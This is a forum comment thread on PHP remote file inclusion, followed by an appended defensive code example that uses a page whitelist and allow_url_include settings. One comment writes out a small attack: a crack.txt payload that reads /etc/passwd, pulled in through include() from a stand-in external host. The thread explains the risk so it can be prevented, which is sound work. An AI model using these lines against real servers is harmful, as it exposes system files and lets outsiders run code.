Article: Ten Security Checks for PHP, Part 1
Subject: Not the kind of article i would expect from o'reilly!
Date: 2003-03-28 09:48:45
From: anonymous2
First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine.
-
Not the kind of article i would expect from o'reilly!
2005-02-06 03:49:12 bbbbbbbbbbbbbb
-
Not the kind of article i would expect from o'reilly!
2005-02-06 13:52:17 Clancy Malcolm
"Obviously, you assume that www.some-BAD-site.com is running php."
No, in fact it is assumed that www.some-BAD-site.com is NOT running PHP and it provides raw PHP code to the server that runs the include statement. This is the essence of this security risk - the PHP engine will execute PHP code loaded from a different web site.
-
Not the kind of article i would expect from o'reilly!
2003-03-29 05:08:06 anonymous2
Include *can* harm your server; read the comments in the PHP documentation before you spread misinformation:
http://www.php.net/manual/en/function.include.php
-
Not the kind of article i would expect from o'reilly!
2003-05-23 00:10:42 clancymalcolm
To further clarify how include(...) can harm your own server...
I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>
Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.
Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");
Then YOUR web server will show me its /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.
Clancy.

Obviously, you assume that www.some-BAD-site.com is running php.
Then, what if it doesn't, eh? ;)
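The defensive counterpart of the scenario in Clancy's post, added here as an example and not code from the thread or the article: a page loader that resolves the requested name against a fixed table of local files, so include() never receives the request string, let alone a URL. The templates/ directory and the three page names are assumptions.

```php
<?php
// Added example (not from the thread): load a page template by name without
// letting the request decide what include() receives.
// Assumed layout: ./templates/home.php, ./templates/about.php, ./templates/contact.php
declare(strict_types=1);

// Map of permitted page names to local files. include() only ever sees a
// value taken from this table, never the raw request string, so a remote
// URL like "http://www.mywebserver.com/crack.txt" can never reach it.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_template(string $requested): ?string
{
    // Unknown name: refuse outright rather than trying to build a path.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(__DIR__ . '/templates');
    if ($base === false) {
        return null;
    }
    $path = realpath($base . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must still sit inside the
    // template directory (guards against a bad table entry or a symlink).
    if ($path === false || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? 'home';
$template  = is_string($requested) ? resolve_template($requested) : null;
if ($template === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $template;

// Independent of the code above, turn the engine-level switch off in php.ini:
//   allow_url_include = Off   ; default since it was introduced in PHP 5.2
//   allow_url_fopen   = Off   ; if nothing on the site needs remote streams
// With allow_url_include off, include()/require() of an http:// URL is
// rejected by PHP itself, regardless of application code.
```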